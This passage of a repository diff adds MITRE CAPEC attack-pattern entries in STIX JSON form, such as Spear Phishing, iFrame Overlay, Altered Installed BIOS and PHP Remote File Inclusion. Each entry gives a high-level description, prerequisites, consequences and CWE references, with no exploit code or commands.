"url": "http://cwe.mitre.org/data/definitions/270.html",
"external_id": "CWE-270"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/693.html",
"external_id": "CWE-693"
},
{
"source_name": "reference_from_CAPEC",
"description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
"external_id": "REF-1"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_consequences": {
"Access_Control": [
"Gain Privileges"
],
"Authorization": [
"Gain Privileges"
],
"Availability": [
"Execute Unauthorized Commands (Run Arbitrary Code)"
],
"Confidentiality": [
"Execute Unauthorized Commands (Run Arbitrary Code)",
"Read Data",
"Gain Privileges"
],
"Integrity": [
"Execute Unauthorized Commands (Run Arbitrary Code)",
"Modify Data"
]
},
"x_capec_example_instances": [
"\n <xhtml:p>Consider a directory on a web server with the following permissions</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">drwxrwxrwx 5 admin public 170 Nov 17 01:08 webroot</xhtml:div>\n <xhtml:p>This could allow an attacker to both execute and upload and execute programs' on the web server. This one vulnerability can be exploited by a threat to probe the system and identify additional vulnerabilities to exploit.</xhtml:p>\n "
],
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"System's configuration must allow an attacker to directly access executable files or upload files to execute. This means that any access control system that is supposed to mediate communications between the subject and the object is set incorrectly or assumes a benign environment."
],
"x_capec_resources_required": [
"Ability to communicate synchronously or asynchronously with server that publishes an over-privileged directory, program, or interface. Optionally, ability to capture output directly through synchronous communication or other method such as FTP."
],
"x_capec_skills_required": {
"Low": "To identify and execute against an over-privileged system interface"
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Very High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--289251fd-9402-48a7-aee0-28b8ba2b3e41.json
+55
View File
@@ -0,0 +1,55 @@
{
"type": "bundle",
"id": "bundle--3f0922e1-dace-4166-a518-4b104b008d18",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--289251fd-9402-48a7-aee0-28b8ba2b3e41",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2017-08-04T00:00:00.000Z",
"name": "Excessive Allocation",
"description": "An adversary causes the target to allocate excessive resources to servicing the attackers' request, thereby reducing the resources available for legitimate services and degrading or denying services. Usually, this attack focuses on memory allocation, but any finite resource on the target could be the attacked, including bandwidth, processing cycles, or other resources. This attack does not attempt to force this allocation through a large number of requests (that would be Resource Depletion through Flooding) but instead uses one or a small number of requests that are carefully formatted to force the target to allocate excessive resources to service this request(s). Often this attack takes advantage of a bug in the target to cause the target to allocate resources vastly beyond what would be needed for a normal request.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/130.html",
"external_id": "CAPEC-130"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/770.html",
"external_id": "CWE-770"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/404.html",
"external_id": "CWE-404"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Meta",
"x_capec_consequences": {
"Availability": [
"Resource Consumption (A successful excessive allocation attack forces the target system to exhaust its resources, thereby compromising the availability of its service.)"
]
},
"x_capec_example_instances": [
"In an Integer Attack, the adversary could cause a variable that controls allocation for a request to hold an excessively large value. Excessive allocation of resources can render a service degraded or unavailable to legitimate users and can even lead to crashing of the target."
],
"x_capec_likelihood_of_attack": "Medium",
"x_capec_prerequisites": [
"The target must accept service requests from the attacker and the adversary must be able to control the resource allocation associated with this request to be in excess of the normal allocation. The latter is usually accomplished through the presence of a bug on the target that allows the adversary to manipulate variables used in the allocation."
],
"x_capec_resources_required": [
"None: No specialized resources are required to execute this type of attack."
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--28ca67a7-6c1e-4c2e-81d0-5b4b389e4ddd.json
+37
View File
@@ -0,0 +1,37 @@
{
"type": "bundle",
"id": "bundle--be073100-3230-4e3e-bc54-a29678e31b37",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--28ca67a7-6c1e-4c2e-81d0-5b4b389e4ddd",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "ICMP Flood",
"description": "An adversary may execute a flooding attack using the ICMP protocol with the intent to deny legitimate users access to a service by consuming the available network bandwidth. A typical attack involves a victim server receiving ICMP packets at a high rate from a wide range of source addresses. Additionally, due to the session-less nature of the ICMP protocol, the source of a packet is easily spoofed making it difficult to find the source of the attack.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/487.html",
"external_id": "CAPEC-487"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/770.html",
"external_id": "CWE-770"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_prerequisites": [
"This type of an attack requires the ability to generate a large amount of ICMP traffic to send to the target server."
],
"x_capec_status": "Draft",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--2a5de98d-00b7-45da-8f6c-b5c722741929.json
+37
View File
@@ -0,0 +1,37 @@
{
"type": "bundle",
"id": "bundle--e7fedaae-9f34-49f0-8c7b-19ef7f3ad312",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--2a5de98d-00b7-45da-8f6c-b5c722741929",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Reflection Injection",
"description": "An adversary supplies a value to the target application which is then used by reflection methods to identify a class, method, or field. For example, in the Java programming language the reflection libraries permit an application to inspect, load, and invoke classes and their components by name. If an adversary can control the input into these methods including the name of the class/method/field or the parameters passed to methods, they can cause the targeted application to invoke incorrect methods, read random fields, or even to load and utilize malicious classes that the adversary created. This can lead to the application revealing sensitive information, returning incorrect results, or even having the adversary take control of the targeted application.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/138.html",
"external_id": "CAPEC-138"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_prerequisites": [
"The target application must utilize reflection libraries and allow users to directly control the parameters to these methods. If the adversary can host classes where the target can invoke them, more powerful variants of this attack are possible.",
"The target application must accept a string as user input, fail to sanitize characters that have a special meaning in the parameter encoding, and insert the user-supplied string in an encoding which is then processed."
],
"x_capec_resources_required": [
"None: No specialized resources are required to execute this type of attack."
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Very High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--2a6965de-02e0-49c0-a275-63cf742c758f.json
+47
View File
@@ -0,0 +1,47 @@
{
"type": "bundle",
"id": "bundle--afa95b73-a000-40ed-a080-ee281dd2787f",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--2a6965de-02e0-49c0-a275-63cf742c758f",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2015-11-09T00:00:00.000Z",
"name": "Lifting Sensitive Data Embedded in Cache",
"description": "An attacker examines a target application's cache for sensitive information. Many applications that communicate with remote entities or which perform intensive calculations utilize caches to improve efficiency. However, if the application computes or receives sensitive information and the cache is not appropriately protected, an attacker can browse the cache and retrieve this information. This can result in the disclosure of sensitive information.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/204.html",
"external_id": "CAPEC-204"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/524.html",
"external_id": "CWE-524"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/311.html",
"external_id": "CWE-311"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_prerequisites": [
"The target application must store sensitive information in a cache.",
"The cache must be inadequately protected against attacker access."
],
"x_capec_resources_required": [
"The attacker must be able to reach the target application's cache. This may require prior access to the machine on which the target application runs. If the cache is encrypted, the attacker would need sufficient computational resources to crack the encryption. With strong encryption schemes, doing this could be intractable, but weaker encryption schemes could allow an attacker with sufficient resources to read the file."
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--2b15bd31-9fa4-4ff4-9986-75f61cf72186.json
+64
View File
@@ -0,0 +1,64 @@
{
"type": "bundle",
"id": "bundle--cc56a1e5-248b-4c62-b22f-67c49e273339",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--2b15bd31-9fa4-4ff4-9986-75f61cf72186",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "Spear Phishing",
"description": "An adversary targets a specific user or group with a Phishing (CAPEC-98) attack tailored to a category of users in order to have maximum relevance and deceptive capability. Spear Phishing is an enhanced version of the Phishing attack targeted to a specific user or group. The quality of the targeted email is usually enhanced by appearing to come from a known or trusted entity. If the email account of some trusted entity has been compromised the message may be digitally signed. The message will contain information specific to the targeted users that will enhance the probability that they will follow the URL to the compromised site. For example, the message may indicate knowledge of the targets employment, residence, interests, or other information that suggests familiarity. As soon as the user follows the instructions in the message, the attack proceeds as a standard Phishing attack.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/163.html",
"external_id": "CAPEC-163"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Accountability": [
"Gain Privileges (Privilege Escalation)"
],
"Authentication": [
"Gain Privileges (Privilege Escalation)"
],
"Authorization": [
"Gain Privileges (Privilege Escalation)"
],
"Confidentiality": [
"Read Data (Information Leakage)"
],
"Integrity": [
"Modify Data (Data Modification)"
],
"Non-Repudiation": [
"Gain Privileges (Privilege Escalation)"
]
},
"x_capec_example_instances": [
"The target, John, gets an official looking e-mail from his bank stating that his or her account has been temporarily locked due to suspected unauthorized activity that happened in the area different that where he lives (details might be provided by the spear phishers) and that John needs to click on the link included in the e-mail to log in to his bank account in order to unlock it. The link in the e-mail looks very similar to that of his bank and once the link is clicked, the log in page is the exact replica. John supplies his login credentials after which he is notified that his account has now been unlocked and that everything is fine. An adversary has just collected John's online banking information which can now be used by him or her to log into John's bank account and transfer John's money to a bank account of the adversary's choice.",
"An adversary can leverage a weakness in the SMB protocol by sending the target, John, an official looking e-mail from his employer's IT Department stating that his system has vulnerable software, which he needs to manually patch by accessing an updated version of the software by clicking on a provided link to a network share. Once the link is clicked, John is directed to an external server controlled by the adversary or to a malicious file on a public access share. The SMB protocol will then attempt to authenticate John to the adversary controlled server, which allows the adversary to capture the hashed credentials over SMB. These credentials can then be used to execute offline brute force attacks or a \"Pass The Hash\" attack."
],
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"None. Any user can be targeted by a Spear Phishing attack."
],
"x_capec_resources_required": [
"An adversay must have the ability communicate their phishing scheme to the victims (via email, instance message, etc.), as well as a website or other platform for victims to enter personal information into."
],
"x_capec_skills_required": {
"Medium": "Spear phishing attacks require specific knowledge of the victims being targeted, such as which bank is being used by the victims, or websites they commonly log into (Google, Facebook, etc)."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--2b255fdc-4366-4755-9e4c-90c1502b7678.json
+47
View File
@@ -0,0 +1,47 @@
{
"type": "bundle",
"id": "bundle--c2986dae-1306-4886-9434-54189ba69385",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--2b255fdc-4366-4755-9e4c-90c1502b7678",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Documentation Alteration to Produce Under-performing Systems",
"description": "An attacker with access to a manufacturer's documentation alters the descriptions of system capabilities with the intent of causing errors in derived system requirements, impacting the overall effectiveness and capability of the system, allowing an attacker to take advantage of the introduced system capability flaw once the system is deployed.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/518.html",
"external_id": "CAPEC-518"
},
{
"source_name": "reference_from_CAPEC",
"description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation",
"url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf",
"external_id": "REF-439"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_example_instances": [
"A security subsystem involving encryption is a part of a product, but due to the demands of this subsystem during operation, the subsystem only runs when a specific amount of memory and processing is available. An attacker alters the descriptions of the system capabilities so that when deployed with the minimal requirements at the victim location, the encryption subsystem is never operational, leaving the system in a weakened security state."
],
"x_capec_likelihood_of_attack": "Low",
"x_capec_prerequisites": [
"Advanced knowledge of software and hardware capabilities of a manufacturer's product.",
"Access to the manufacturer's documentation."
],
"x_capec_skills_required": {
"High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--2b924641-5ed0-411c-bcfe-02ff55a2ec73.json
+40
View File
@@ -0,0 +1,40 @@
{
"type": "bundle",
"id": "bundle--3bae8ddc-eaa6-41cb-9967-14c0ca0d53c3",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--2b924641-5ed0-411c-bcfe-02ff55a2ec73",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "Web Services Protocol Manipulation",
"description": "An adversary manipulates a web service related protocol to cause a web application or service to react differently than intended. This can either be performed through the manipulation of call parameters to include unexpected values, or by changing the called function to one that should normally be restricted or limited. By leveraging this pattern of attack, the adversary is able to gain access to data or resources normally restricted, or to cause the application or service to crash.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/278.html",
"external_id": "CAPEC-278"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/707.html",
"external_id": "CWE-707"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_prerequisites": [
"The targeted application or service must rely on web service protocols in such a way that malicious manipulation of them can alter functionality."
],
"x_capec_resources_required": [
"The attacker must be able to manipulate the communications to the targeted application or service."
],
"x_capec_status": "Draft",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--2bd9317a-65b9-4684-be47-ea3f173f47ff.json
+42
View File
@@ -0,0 +1,42 @@
{
"type": "bundle",
"id": "bundle--06128a85-1414-4f7a-9c96-d13fb530305b",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--2bd9317a-65b9-4684-be47-ea3f173f47ff",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2015-11-09T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "Application Footprinting",
"description": "An adversary engages in active probing and exploration activities to determine the type or version of an application installed on a remote target. This differs from fingerprinting where the attacker's action is passive through the examination of application output.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/580.html",
"external_id": "CAPEC-580"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_consequences": {
"Confidentiality": [
"Read Data"
]
},
"x_capec_likelihood_of_attack": "Low",
"x_capec_prerequisites": [
"The adversary must have logical access to the target network and system."
],
"x_capec_skills_required": {
"Low": "The adversary needs to know basic linux commands."
},
"x_capec_status": "Stable",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--2c2565bb-c39a-4d70-96cc-d7ea60b5abb0.json
+41
View File
@@ -0,0 +1,41 @@
{
"type": "bundle",
"id": "bundle--e23ec95d-fecc-4518-ab0d-774927cffab1",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--2c2565bb-c39a-4d70-96cc-d7ea60b5abb0",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "Spoofing of UDDI/ebXML Messages",
"description": "An attacker spoofs a UDDI, ebXML, or similar message in order to impersonate a service provider in an e-business transaction. UDDI, ebXML, and similar standards are used to identify businesses in e-business transactions. Among other things, they identify a particular participant, WSDL information for SOAP transactions, and supported communication protocols, including security protocols. By spoofing one of these messages an attacker could impersonate a legitimate business in a transaction or could manipulate the protocols used between a client and business. This could result in disclosure of sensitive information, loss of message integrity, or even financial fraud.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/218.html",
"external_id": "CAPEC-218"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/345.html",
"external_id": "CWE-345"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_prerequisites": [
"The targeted business's UDDI or ebXML information must be served from a location that the attacker can spoof or compromise or the attacker must be able to intercept and modify unsecured UDDI/ebXML messages in transit."
],
"x_capec_resources_required": [
"The attacker must be able to force the target user to accept their spoofed UDDI or ebXML message as opposed to the a message associated with a legitimate company. Depending on the follow-on for the attack, the attacker may also need to serve its own web services."
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--2c3069bb-826c-469e-a7be-57ade8c0b7b4.json
+41
View File
@@ -0,0 +1,41 @@
{
"type": "bundle",
"id": "bundle--c9c7681e-0ab3-48ed-b0e6-a4116fe21f80",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--2c3069bb-826c-469e-a7be-57ade8c0b7b4",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2015-11-09T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "Cellular Jamming",
"description": "In this attack scenario, the attacker actively transmits signals to overpower and disrupt the communication between a cellular user device and a cell tower. Several existing techniques are known in the open literature for this attack for 2G, 3G, and 4G LTE cellular technology. For example, some attacks target cell towers by overwhelming them with false status messages, while others introduce high levels of noise on signaling channels.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/605.html",
"external_id": "CAPEC-605"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Availability": [
"Resource Consumption (The attacker's goal is to prevent users from accessing the cellular network. Denying connectivity to the cellular network prevents the user from being able to transmit or receive any data, which also prevents VOIP calls, however this attack poses no threat to data confidentiality.)"
]
},
"x_capec_prerequisites": [
"Lack of anti-jam features in cellular technology (2G, 3G, 4G, LTE)"
],
"x_capec_skills_required": {
"Low": "This attack can be performed by low capability attackers with commercially available tools."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--2cd72ff3-e4df-4b86-ad84-5d4ace9f3ab7.json
+29
View File
@@ -0,0 +1,29 @@
{
"type": "bundle",
"id": "bundle--ccbddb41-6408-4a46-95e0-7697586023d5",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--2cd72ff3-e4df-4b86-ad84-5d4ace9f3ab7",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2017-05-01T00:00:00.000Z",
"name": "DEPRECATED: Malicious Logic Insertion via Counterfeit Hardware",
"description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-452 : Malicious Logic Insertion into Product Hardware. Please refer to this other pattern going forward.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/453.html",
"external_id": "CAPEC-453"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_status": "Deprecated",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--2cee1dd8-0815-4116-8e4a-14b43e9d8463.json
+42
View File
@@ -0,0 +1,42 @@
{
"type": "bundle",
"id": "bundle--f3d47174-e694-4a8c-8924-8ba263de3712",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--2cee1dd8-0815-4116-8e4a-14b43e9d8463",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2017-08-04T00:00:00.000Z",
"name": "XSS Targeting Error Pages",
"description": "An adversary distributes a link (or possibly some other query structure) with a request to a third party web server that is malformed and also contains a block of exploit code in order to have the exploit become live code in the resulting error page. When the third party web server receives the crafted request and notes the error it then creates an error message that echoes the malformed message, including the exploit. Doing this converts the exploit portion of the message into to valid language elements that are executed by the viewing browser. When a victim executes the query provided by the attacker the infected error message error message is returned including the exploit code which then runs in the victim's browser. XSS can result in execution of code as well as data leakage (e.g. session cookies can be sent to the attacker). This type of attack is especially dangerous since the exploit appears to come from the third party web server, who the victim may trust and hence be more vulnerable to deception.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/198.html",
"external_id": "CAPEC-198"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/81.html",
"external_id": "CWE-81"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_prerequisites": [
"A third party web server which fails to adequately sanitize messages sent in error pages.",
"The victim must be made to execute a query crafted by the attacker which results in the infected error report."
],
"x_capec_resources_required": [
"None: No specialized resources are required to execute this type of attack."
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--2d4f8222-023b-42ef-9b7f-eef0e7a105b7.json
+48
View File
@@ -0,0 +1,48 @@
{
"type": "bundle",
"id": "bundle--f81908a4-1fe4-4cb9-b330-ca1a1ee94a6b",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--2d4f8222-023b-42ef-9b7f-eef0e7a105b7",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Altered Installed BIOS",
"description": "An attacker with access to download and update system software sends a maliciously altered BIOS to the victim or victim supplier/integrator, which when installed allows for future exploitation.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/532.html",
"external_id": "CAPEC-532"
},
{
"source_name": "reference_from_CAPEC",
"description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation",
"url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf",
"external_id": "REF-439"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_example_instances": [
"An attacker compromises the download and update portion of a manufacturer's web presence, and develops a malicious BIOS that in addition to the normal functionality will also at a specific time of day disable the remote access subsystem's security checks. The malicious BIOS is put in place on the manufacturer's website, the victim location is sent an official-looking email informing the victim of the availability of a new BIOS with bug fixes and enhanced performance capabilities to entice the victim to install the new BIOS quickly. The malicious BIOS is downloaded and installed on the victim's system, which allows for additional compromise by the attacker."
],
"x_capec_likelihood_of_attack": "Low",
"x_capec_prerequisites": [
"Advanced knowledge about the installed target system design.",
"Advanced knowledge about the download and update installation processes.",
"Access to the download and update system(s) used to deliver BIOS images."
],
"x_capec_skills_required": {
"High": "Able to develop a malicious BIOS image with the original functionality as a normal BIOS image, but with added functionality that allows for later compromise and/or disruption."
},
"x_capec_status": "Stable",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--2d50280d-8c0c-46e3-9397-c46d577cff93.json
+85
View File
@@ -0,0 +1,85 @@
{
"type": "bundle",
"id": "bundle--58984211-bdee-451d-af62-3e7eea8974e1",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--2d50280d-8c0c-46e3-9397-c46d577cff93",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "iFrame Overlay",
"description": "In an iFrame overlay attack the victim is tricked into unknowingly initiating some action in one system while interacting with the UI from seemingly completely different system. While being logged in to some target system, the victim visits the attackers' malicious site which displays a UI that the victim wishes to interact with. In reality, the iFrame overlay page has a transparent layer above the visible UI with action controls that the attacker wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the attacker may have just tricked the victim into executing some potentially privileged (and most undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks he or she is clicking on versus what he or she is actually clicking on.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/222.html",
"external_id": "CAPEC-222"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/1021.html",
"external_id": "CWE-1021"
},
{
"source_name": "reference_from_CAPEC",
"description": "Michal Zalewski, Browser Security Handbook, 2008, Google Inc.",
"url": "https://code.google.com/archive/p/browsersec/wikis/Main.wiki",
"external_id": "REF-84"
},
{
"source_name": "reference_from_CAPEC",
"description": "M. Mahemoff, Explaining the \"Don't Click\" Clickjacking Tweetbomb, 2009--02---12, Software As She's Developed",
"url": "http://softwareas.com/explaining-the-dont-click-clickjacking-tweetbomb",
"external_id": "REF-85"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Access_Control": [
"Bypass Protection Mechanism"
],
"Accountability": [
"Gain Privileges"
],
"Authentication": [
"Gain Privileges"
],
"Authorization": [
"Execute Unauthorized Commands (Run Arbitrary Code)",
"Gain Privileges",
"Bypass Protection Mechanism"
],
"Confidentiality": [
"Read Data"
],
"Integrity": [
"Modify Data"
],
"Non-Repudiation": [
"Gain Privileges"
]
},
"x_capec_example_instances": [
"The following example is a real-world iFrame overlay attack [2]. In this attack, the malicious page embeds Twitter.com on a transparent IFRAME. The status-message field is initialized with the URL of the malicious page itself. To provoke the click, which is necessary to publish the entry, the malicious page displays a button labeled \"Don't Click.\" This button is aligned with the invisible \"Update\" button of Twitter. Once the user performs the click, the status message (i.e., a link to the malicious page itself) is posted to his/ her Twitter profile."
],
"x_capec_likelihood_of_attack": "Medium",
"x_capec_prerequisites": [
"The victim is communicating with the target application via a web based UI and not a thick client. The victim's browser security policies allow iFrames. The victim uses a modern browser that supports UI elements like clickable buttons (i.e. not using an old text only browser). The victim has an active session with the target system. The target system's interaction window is open in the victim's browser and supports the ability for initiating sensitive actions on behalf of the user in the target system."
],
"x_capec_resources_required": [
"None: No specialized resources are required to execute this type of attack."
],
"x_capec_skills_required": {
"High": "Crafting the proper malicious site and luring the victim to this site is not a trivial task."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--2d7b12ba-47d5-4617-be01-dfa415317b93.json
+103
View File
@@ -0,0 +1,103 @@
{
"type": "bundle",
"id": "bundle--1cd57813-abac-4e4b-8fd7-6788d2dcf72d",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--2d7b12ba-47d5-4617-be01-dfa415317b93",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "PHP Remote File Inclusion",
"description": "In this pattern the adversary is able to load and execute arbitrary code remotely available from the application. This is usually accomplished through an insecurely configured PHP runtime environment and an improperly sanitized \"include\" or \"require\" call, which the user can then control to point to any web-accessible file. This allows adversaries to hijack the targeted application and force it to execute their own instructions.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/193.html",
"external_id": "CAPEC-193"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/98.html",
"external_id": "CWE-98"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/80.html",
"external_id": "CWE-80"
},
{
"source_name": "cwe",
